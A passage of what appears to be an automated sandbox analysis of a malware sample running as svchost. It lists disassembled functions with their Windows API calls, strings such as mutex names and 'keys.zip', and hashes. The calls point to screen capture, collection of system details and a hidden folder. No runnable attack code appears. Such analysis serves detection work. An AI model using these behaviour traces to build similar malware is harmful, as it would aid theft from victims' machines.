                                                                                                                                                                                                              • Instruction ID: f7751ac520db3301afa3af47716f7f1bfb809d9def141e3ec11ecb7f97e22ee4
                                                                                                                                                                                                              • Opcode Fuzzy Hash: e54e580e052274e6a70002295f794497b565d9c0362c52adc32ea4fb973d07a1
                                                                                                                                                                                                              • Instruction Fuzzy Hash: B201D634AC6311BFF22267604C2AF9E7A986F05B96F140610F91AF61C087E496048AAA
                                                                                                                                                                                                              Function 02C9F870 Relevance: 20.1, APIs: 16, Instructions: 76memoryCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000,?,?,00000000,?,02C9FB54,?), ref: 02C9F88F
                                                                                                                                                                                                              • HeapValidate.KERNEL32(00000000,?,02C9FB54,?), ref: 02C9F892
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000,?,02C9FB54,?), ref: 02C9F89B
                                                                                                                                                                                                              • HeapFree.KERNEL32(00000000,?,02C9FB54,?), ref: 02C9F89E
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,?,?,?,00000000,?,02C9FB54,?), ref: 02C9F8B1
                                                                                                                                                                                                              • HeapValidate.KERNEL32(00000000,?,02C9FB54,?), ref: 02C9F8B4
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,?,?,02C9FB54,?), ref: 02C9F8BD
                                                                                                                                                                                                              • HeapFree.KERNEL32(00000000,?,02C9FB54,?), ref: 02C9F8C0
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000,?,?,00000000,?,02C9FB54,?), ref: 02C9F8D3
                                                                                                                                                                                                              • HeapValidate.KERNEL32(00000000,?,02C9FB54,?), ref: 02C9F8D6
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000,?,02C9FB54,?), ref: 02C9F8DF
                                                                                                                                                                                                              • HeapFree.KERNEL32(00000000,?,02C9FB54,?), ref: 02C9F8E2
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,?,?,?,00000000,?,02C9FB54,?), ref: 02C9F8F5
                                                                                                                                                                                                              • HeapValidate.KERNEL32(00000000,?,02C9FB54,?), ref: 02C9F8F8
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,?,?,02C9FB54,?), ref: 02C9F901
                                                                                                                                                                                                              • HeapFree.KERNEL32(00000000,?,02C9FB54,?), ref: 02C9F904
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.2976326837.0000000002C90000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CEE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_2c90000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Heap$Process$FreeValidate
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 1670920773-0
                                                                                                                                                                                                              • Opcode ID: 3678f009538092688149e2ed6be8738235a339d9d2213c798ebeede8a3082212
                                                                                                                                                                                                              • Instruction ID: d1096a54857fcc4e6573e5213314590c992325e7058f9f816559a331337bf986
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 3678f009538092688149e2ed6be8738235a339d9d2213c798ebeede8a3082212
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 98114971A40305BBDA60ABB69C4CF0B7F6CEFC5BA5F25451AB908D7280CA30E400C9B4
                                                                                                                                                                                                              Function 02C9C950 Relevance: 19.6, APIs: 13, Instructions: 116windowCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • IsWindow.USER32(00000000), ref: 02C9C96D
                                                                                                                                                                                                              • IsWindowVisible.USER32(00000000), ref: 02C9C97C
                                                                                                                                                                                                                • Part of subcall function 02C9DCE0: GetClassNameA.USER32(?,?,00000101), ref: 02C9DCF6
                                                                                                                                                                                                              • GetWindowRect.USER32(00000000,?), ref: 02C9C9B9
                                                                                                                                                                                                              • GetClassLongA.USER32(00000000,000000E6), ref: 02C9C9C2
                                                                                                                                                                                                              • PrintWindow.USER32(00000000,?,00000000), ref: 02C9C9D5
                                                                                                                                                                                                              • RedrawWindow.USER32(00000000,00000000,00000000,00000485,00000000,?), ref: 02C9C9FB
                                                                                                                                                                                                              • CreateRectRgn.GDI32(?,?,?,?), ref: 02C9CA11
                                                                                                                                                                                                              • GetWindowRgn.USER32(00000000,00000000), ref: 02C9CA1B
                                                                                                                                                                                                              • OffsetRgn.GDI32(00000000,?,?), ref: 02C9CA35
                                                                                                                                                                                                              • SelectClipRgn.GDI32(?,00000000), ref: 02C9CA40
                                                                                                                                                                                                              • BitBlt.GDI32(?,?,?,?,?,?,00000000,00000000,00CC0020), ref: 02C9CA69
                                                                                                                                                                                                              • SelectClipRgn.GDI32(?,00000000), ref: 02C9CA72
                                                                                                                                                                                                              • DeleteObject.GDI32(00000000), ref: 02C9CA75
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.2976326837.0000000002C90000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CEE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_2c90000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Window$ClassClipRectSelect$CreateDeleteLongNameObjectOffsetPrintRedrawVisible
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 3597830993-0
                                                                                                                                                                                                              • Opcode ID: ea4f4c4cbc7d3670aedd73d1f6991fef46a98e849a6f68da2e2a74647081e2a2
                                                                                                                                                                                                              • Instruction ID: f120f302d7fc47d59ea6330b038582a07844700f32db141f4ec22f48013d3a2e
                                                                                                                                                                                                              • Opcode Fuzzy Hash: ea4f4c4cbc7d3670aedd73d1f6991fef46a98e849a6f68da2e2a74647081e2a2
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 4D315E71A81104AFDB10DB64DC89FBF7BB8EF89691F504609FA05E3180DB746A11CAA5
                                                                                                                                                                                                              Function 02CBE214 Relevance: 19.4, APIs: 10, Strings: 1, Instructions: 200filetimeCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • MultiByteToWideChar.KERNEL32(000004E3,00000000,?,?,?,?), ref: 02CBE265
                                                                                                                                                                                                              • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000), ref: 02CBE281
                                                                                                                                                                                                              • GetFileInformationByHandle.KERNEL32(00000000,?), ref: 02CBE29B
                                                                                                                                                                                                              • FileTimeToSystemTime.KERNEL32(?,?), ref: 02CBE2B1
                                                                                                                                                                                                              • wsprintfA.USER32 ref: 02CBE2DC
                                                                                                                                                                                                              • realloc.MSVCRT ref: 02CBE302
                                                                                                                                                                                                              • CloseHandle.KERNEL32(?), ref: 02CBE375
                                                                                                                                                                                                              • free.MSVCRT(00000000,?,00000004,?,00000000,00000000), ref: 02CBE40A
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              • %02d/%02d/%04d %02d:%02d, xrefs: 02CBE2D6
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.2976326837.0000000002C90000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CEE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_2c90000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: File$HandleTime$ByteCharCloseCreateInformationMultiSystemWidefreereallocwsprintf
                                                                                                                                                                                                              • String ID: %02d/%02d/%04d %02d:%02d
                                                                                                                                                                                                              • API String ID: 3846129198-4051342895
                                                                                                                                                                                                              • Opcode ID: f5473542be9f1c85a46d1630553239434a2b0ff958422bcbfce17bc0e801646a
                                                                                                                                                                                                              • Instruction ID: 9533300b66df8185ad8ee68d6591f3d5d88fe3f06bf3dfe22b917ff02df8f767
                                                                                                                                                                                                              • Opcode Fuzzy Hash: f5473542be9f1c85a46d1630553239434a2b0ff958422bcbfce17bc0e801646a
                                                                                                                                                                                                              • Instruction Fuzzy Hash: F7614571A006099FDB11CF78DC44BEEBBF4EF89711F4046A9E94AD7241EB31A605CBA0
                                                                                                                                                                                                              Function 02CB41B9 Relevance: 19.4, APIs: 7, Strings: 4, Instructions: 185COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • PathAddBackslashA.SHLWAPI(02CED19C,?,00000000), ref: 02CB41D7
                                                                                                                                                                                                              • _snprintf.MSVCRT ref: 02CB4237
                                                                                                                                                                                                              • PathAddBackslashA.SHLWAPI(02CED19C), ref: 02CB4297
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.2976326837.0000000002C90000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CEE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_2c90000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: BackslashPath$_snprintf
                                                                                                                                                                                                              • String ID: Local\{EAF7722F-8989-4fe1-977D-95CD777C0214}$keys.zip$path%i.txt$path.txt
                                                                                                                                                                                                              • API String ID: 761212885-4167808235
                                                                                                                                                                                                              • Opcode ID: 6ae2d0736109319f49e48769608d8d87420c90d20e99e22aba4685aafa6d1b87
                                                                                                                                                                                                              • Instruction ID: 860f304721d169c673fa606961e4edee3d9b54bb1bb7c36c4af3823cd9a884c1
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 6ae2d0736109319f49e48769608d8d87420c90d20e99e22aba4685aafa6d1b87
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 53512C34D446594FCF2BCB389878BFA7BE6EF8A300F144594D98AD7201DB719A48C740
                                                                                                                                                                                                              Function 00401B20 Relevance: 19.3, APIs: 8, Strings: 3, Instructions: 66memorylibraryloaderCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                • Part of subcall function 00401150: CreateFileA.KERNEL32(G,@,80000000,00000003,00000000,00000003,00000080,00000000,00000000,?,00000000,?,?,?,00401B44,00000000,00000000), ref: 00401177
                                                                                                                                                                                                                • Part of subcall function 00401150: GetFileSizeEx.KERNEL32(00000000,?,?,?,?,00401B44,00000000,00000000,?,00000000,00402C47), ref: 00401193
                                                                                                                                                                                                                • Part of subcall function 00401150: GetProcessHeap.KERNEL32(00000008,?,?,?,?,00401B44,00000000,00000000,?,00000000,00402C47), ref: 004011B3
                                                                                                                                                                                                                • Part of subcall function 00401150: HeapAlloc.KERNEL32(00000000,?,?,?,00401B44,00000000,00000000,?,00000000,00402C47), ref: 004011BA
                                                                                                                                                                                                                • Part of subcall function 00401150: memset.MSVCRT ref: 004011CD
                                                                                                                                                                                                                • Part of subcall function 00401150: SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001,?,?,?,00401B44), ref: 004011EA
                                                                                                                                                                                                                • Part of subcall function 00401150: LockFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,?,?,00401B44), ref: 004011FA
                                                                                                                                                                                                                • Part of subcall function 00401150: ReadFile.KERNEL32(00000000,00000000,?,00000000,00000000,?,?,?,00401B44), ref: 00401209
                                                                                                                                                                                                                • Part of subcall function 00401150: UnlockFile.KERNEL32(00000000,00401B44,00000000,?,00000000,?,?,?,00401B44), ref: 0040121C
                                                                                                                                                                                                                • Part of subcall function 00401150: GetProcessHeap.KERNEL32(00000000,00000000), ref: 00401231
                                                                                                                                                                                                                • Part of subcall function 00401150: HeapValidate.KERNEL32(00000000), ref: 00401234
                                                                                                                                                                                                                • Part of subcall function 00401150: GetProcessHeap.KERNEL32(00000000,00000000), ref: 00401241
                                                                                                                                                                                                                • Part of subcall function 00401150: HeapFree.KERNEL32(00000000), ref: 00401244
                                                                                                                                                                                                              • RtlImageNtHeader.NTDLL(00000000), ref: 00401B4F
                                                                                                                                                                                                              • GetTickCount.KERNEL32 ref: 00401B63
                                                                                                                                                                                                              • GetModuleHandleA.KERNEL32(ntdll.dll), ref: 00401B74
                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,RtlUniform), ref: 00401B84
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00401BBE
                                                                                                                                                                                                              • HeapValidate.KERNEL32(00000000), ref: 00401BC1
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00401BCE
                                                                                                                                                                                                              • HeapFree.KERNEL32(00000000), ref: 00401BD1
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.2972647321.0000000000400000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.2972647321.000000000045E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_400000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Heap$File$Process$FreeValidate$AddressAllocCountCreateHandleHeaderImageLockModulePointerProcReadSizeTickUnlockmemset
                                                                                                                                                                                                              • String ID: G,@$RtlUniform$ntdll.dll
                                                                                                                                                                                                              • API String ID: 1392322707-905597979
                                                                                                                                                                                                              • Opcode ID: 2010ef54e731929bdeef478eef36219a5a0ac2089432c3df2103351bfe7421e8
                                                                                                                                                                                                              • Instruction ID: 64d0ad1f4564684b16137518c26293c6cc216b866d3c13d6df455aa1ddd35d97
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 2010ef54e731929bdeef478eef36219a5a0ac2089432c3df2103351bfe7421e8
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 00118271600304ABD724ABB69D49F9B7BA89F85755F044136FB09F62E1EB38DD00CA68
                                                                                                                                                                                                              Function 02CACB80 Relevance: 19.3, APIs: 8, Strings: 3, Instructions: 45sleepsynchronizationCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • OpenMutexA.KERNEL32(00100000,00000000,Local\{EAF799BF-8989-4fe1-9A0D-95CD39DC2014}), ref: 02CACBAC
                                                                                                                                                                                                              • ReleaseMutex.KERNEL32(00000000), ref: 02CACBB9
                                                                                                                                                                                                              • GetHandleInformation.KERNEL32(00000000,?), ref: 02CACBCD
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 02CACBDF
                                                                                                                                                                                                              • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 02CACBEE
                                                                                                                                                                                                              • PathAddBackslashA.SHLWAPI(A23C41FB), ref: 02CACBF5
                                                                                                                                                                                                              • Sleep.KERNEL32(00009C40,A23C41FB,BSS), ref: 02CACC0F
                                                                                                                                                                                                              • Sleep.KERNEL32(00000064), ref: 02CACC15
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.2976326837.0000000002C90000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CEE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_2c90000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: HandleMutexSleep$BackslashCloseInformationObjectOpenPathReleaseSingleWait
                                                                                                                                                                                                              • String ID: A23C41FB$BSS$Local\{EAF799BF-8989-4fe1-9A0D-95CD39DC2014}
                                                                                                                                                                                                              • API String ID: 3206501308-2766367083
                                                                                                                                                                                                              • Opcode ID: b36416dfac798da35b01a88c2e63b0bb723b9785cdf8469011fe919f73fb2ec3
                                                                                                                                                                                                              • Instruction ID: 8ddd11115167296f4dfd5e08bbad7e3c86f00188da3df7beb61daaee5b289aae
                                                                                                                                                                                                              • Opcode Fuzzy Hash: b36416dfac798da35b01a88c2e63b0bb723b9785cdf8469011fe919f73fb2ec3
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 3E012B309CB306BFE6116764AC19F1A775C6B44F98F400716F952E61C1DBB0A604C7B6
                                                                                                                                                                                                              Function 02CBA280 Relevance: 18.9, APIs: 15, Instructions: 136COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.2976326837.0000000002C90000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CEE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_2c90000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: free$malloc
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 2190258309-0
                                                                                                                                                                                                              • Opcode ID: 6ddbe5e6ace58741bbda5e8c19c7f2cde3a30802d1e3b1f638d3b5eec5e1b02a
                                                                                                                                                                                                              • Instruction ID: b0643654d04fdb829ad78218c76a5db3349bf3e7ab5d0bd0290c9ca3f8638c0c
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 6ddbe5e6ace58741bbda5e8c19c7f2cde3a30802d1e3b1f638d3b5eec5e1b02a
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 4E4113F1D41611DBCB22DF58E881B9A77ACAF84704F1A4E69E88E4F604D731E950CB92
                                                                                                                                                                                                              Function 02CA1BD0 Relevance: 17.9, APIs: 14, Instructions: 355COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.2976326837.0000000002C90000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CEE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_2c90000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                              • Opcode ID: 9cd7970aaa0fc3d0c2a554a0c93235b56b9a87b980fbf6dd67c3f7c1537dbf34
                                                                                                                                                                                                              • Instruction ID: 42f7c7159b540e391533a8eab95bc4d91cbb8a1c0906a35c47911b8022bd7fe4
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 9cd7970aaa0fc3d0c2a554a0c93235b56b9a87b980fbf6dd67c3f7c1537dbf34
                                                                                                                                                                                                              • Instruction Fuzzy Hash: E8C10435A006579FCB15CF28C8B4BAEB7B5EF89348F184284ED599B340D7B1EA05CB90
                                                                                                                                                                                                              Function 02CB5BB0 Relevance: 17.6, APIs: 14, Instructions: 147COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.2976326837.0000000002C90000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CEE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_2c90000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: memset
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 2221118986-0
                                                                                                                                                                                                              • Opcode ID: be8d046aac3d66de33eaff61eadcc3d36ea14f354627e3c2c3b171c4190cfe4c
                                                                                                                                                                                                              • Instruction ID: f7bb126d2e30c19f919275b667e966a8c667444c95d0c24535103d968a039369
                                                                                                                                                                                                              • Opcode Fuzzy Hash: be8d046aac3d66de33eaff61eadcc3d36ea14f354627e3c2c3b171c4190cfe4c
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 56514CB1D41215AACB10DFA4C884AEA7BB9AF08340F14457AEE0CAF285D7B45245DFE1
                                                                                                                                                                                                              Function 02CB3B40 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 138COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • PathAddBackslashA.SHLWAPI(02CED098), ref: 02CB3B70
                                                                                                                                                                                                              • CreateDirectoryA.KERNEL32(?,00000000), ref: 02CB3BB1
                                                                                                                                                                                                              • GetLastError.KERNEL32 ref: 02CB3BBB
                                                                                                                                                                                                              • IsUserAnAdmin.SHELL32 ref: 02CB3BC3
                                                                                                                                                                                                              • PathMakeSystemFolderA.SHLWAPI(?), ref: 02CB3BD4
                                                                                                                                                                                                              • SetLastError.KERNEL32(00000000), ref: 02CB3BDB
                                                                                                                                                                                                              • SetCurrentDirectoryA.KERNEL32(?), ref: 02CB3BE8
                                                                                                                                                                                                              • PathAddBackslashA.SHLWAPI(02CED098,?,02CB3D9C), ref: 02CB3C57
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.2976326837.0000000002C90000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CEE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_2c90000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Path$BackslashDirectoryErrorLast$AdminCreateCurrentFolderMakeSystemUser
                                                                                                                                                                                                              • String ID: keys.zip$path1.txt
                                                                                                                                                                                                              • API String ID: 1373881290-1274251082
                                                                                                                                                                                                              • Opcode ID: c7074b3e4afb6adeed9793855cfaa2d26edfb0bfcb87f3c84e6156f567f9d9e0
                                                                                                                                                                                                              • Instruction ID: f5f3a2a3c3197c9e3287ef4dd6cb1ebe0008c8dfedaaf877542c6caa8daeca8c
                                                                                                                                                                                                              • Opcode Fuzzy Hash: c7074b3e4afb6adeed9793855cfaa2d26edfb0bfcb87f3c84e6156f567f9d9e0
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 524129746046954BCF26CB3898A87EA7BE4FF96300F0446D8E98AC7300DB71DA88C790
                                                                                                                                                                                                              Function 02CB50F0 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 87memorystringCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • memset.MSVCRT ref: 02CB5124
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000008,00000110,?,00000000,00000000), ref: 02CB5133
                                                                                                                                                                                                              • HeapAlloc.KERNEL32(00000000,?,00000000,00000000), ref: 02CB513A
                                                                                                                                                                                                              • memset.MSVCRT ref: 02CB5152
                                                                                                                                                                                                              • GetComputerNameA.KERNEL32(00000000,00000104), ref: 02CB5169
                                                                                                                                                                                                              • GetLastError.KERNEL32(?,?,?,?,00000000,00000000), ref: 02CB516F
                                                                                                                                                                                                                • Part of subcall function 02CA41E0: GetProcessHeap.KERNEL32(00000008,02CB5097,00000000,75A934D0,?,?,02CB5084,00000104,?,?,?,?,00000000,00000000), ref: 02CA41FE
                                                                                                                                                                                                                • Part of subcall function 02CA41E0: HeapAlloc.KERNEL32(00000000,?,?,02CB5084,00000104,?,?,?,?,00000000,00000000), ref: 02CA4205
                                                                                                                                                                                                                • Part of subcall function 02CA41E0: memset.MSVCRT ref: 02CA4215
                                                                                                                                                                                                              • GetComputerNameA.KERNEL32(00000000,00000104), ref: 02CB5190
                                                                                                                                                                                                              • StrChrIA.SHLWAPI(?,?,?,00000000,?,?,?,?,00000000,00000000), ref: 02CB51B7
                                                                                                                                                                                                              • lstrcpynA.KERNEL32(?,00000001,00000104,?,?,00000000,?,?,?,?,00000000,00000000), ref: 02CB51CB
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              • ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789_, xrefs: 02CB5100
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.2976326837.0000000002C90000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CEE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_2c90000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Heap$memset$AllocComputerNameProcess$ErrorLastlstrcpyn
                                                                                                                                                                                                              • String ID: ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789_
                                                                                                                                                                                                              • API String ID: 734199406-1705633369
                                                                                                                                                                                                              • Opcode ID: a3dd6831918cb3921cf08309ee84a76600f8fb6205de735458d0356f88a9fa74
                                                                                                                                                                                                              • Instruction ID: 364505146b703341fe9408c5e01273465929412c5dc486967c2ebe8c3198fa31
                                                                                                                                                                                                              • Opcode Fuzzy Hash: a3dd6831918cb3921cf08309ee84a76600f8fb6205de735458d0356f88a9fa74
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 0A214B72D00215A7DB2296648C44FFFB7BD9FC8781F604558FA45E7180EBB09A018BA0
                                                                                                                                                                                                              Function 02CB5390 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 68memorylibraryloaderCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                • Part of subcall function 02C974A0: CreateFileA.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,74DEF380,00000000,00000000,?,?,02CA4E91,?,00000000), ref: 02C974C6
                                                                                                                                                                                                                • Part of subcall function 02C974A0: GetFileSizeEx.KERNEL32(00000000,?,?,?,02CA4E91,?,00000000,?,?,00000000), ref: 02C974E4
                                                                                                                                                                                                                • Part of subcall function 02C974A0: GetProcessHeap.KERNEL32(00000008,?,?,?,02CA4E91,?,00000000,?,?,00000000), ref: 02C9750D
                                                                                                                                                                                                                • Part of subcall function 02C974A0: RtlAllocateHeap.NTDLL(00000000,?,?,02CA4E91,?,00000000,?,?,00000000), ref: 02C97514
                                                                                                                                                                                                                • Part of subcall function 02C974A0: memset.MSVCRT ref: 02C97527
                                                                                                                                                                                                                • Part of subcall function 02C974A0: SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001), ref: 02C97553
                                                                                                                                                                                                                • Part of subcall function 02C974A0: LockFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 02C97563
